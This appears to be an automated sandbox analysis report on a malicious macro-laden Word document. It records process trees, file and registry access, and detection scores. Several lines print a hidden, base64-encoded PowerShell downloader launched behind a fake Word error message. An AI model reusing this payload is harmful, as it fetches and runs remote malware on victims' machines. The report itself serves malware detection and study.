Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................B.............................. .y.............................................................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................B.............................. .y.............................................................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................B.............................. .y.............................................................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X ..............................}..v..... ......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v.....'......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X(..............................}..v.....(......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............R..j.... Fv.............................}..v....(.......0.{.....................t.......h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j....................................}..v....`/......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../...............R..j.... Fv.............................}..v.....6......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../..................j.....6..............................}..v....@7......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;...............R..j.... Fv.............................}..v.....<......0.{.....................r.......h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;..................j....H=..............................}..v.....=......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....G....... .......R..j.... Fv.............................}..v....XA......0.{..............Bv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....G..................j.....B..............................}..v.....B......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................29.j.....(..............................}..v.....['.....0.{.............8.v.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................29.j.....(..............................}..v....H.'.....0.{.............8.v.............h...............	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: v22Pc0qA.doc.doc	Metadefender: Detection: 44%
Source: v22Pc0qA.doc.doc	ReversingLabs: Detection: 86%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzA
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2113923637.00000000028B0000.00000002.00000001.sdmp

Source: v22Pc0qA.doc.doc

Initial sample: OLE summary subject = extensible Automotive generate withdrawal Wooden Global architecture

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Source: v22Pc0qA.doc.doc	Stream path 'Macros/VBA/Lxvinhyq0hu0i' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Lxvinhyq0hu0i			Name: Lxvinhyq0hu0i

PowerShell case anomaly found

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkA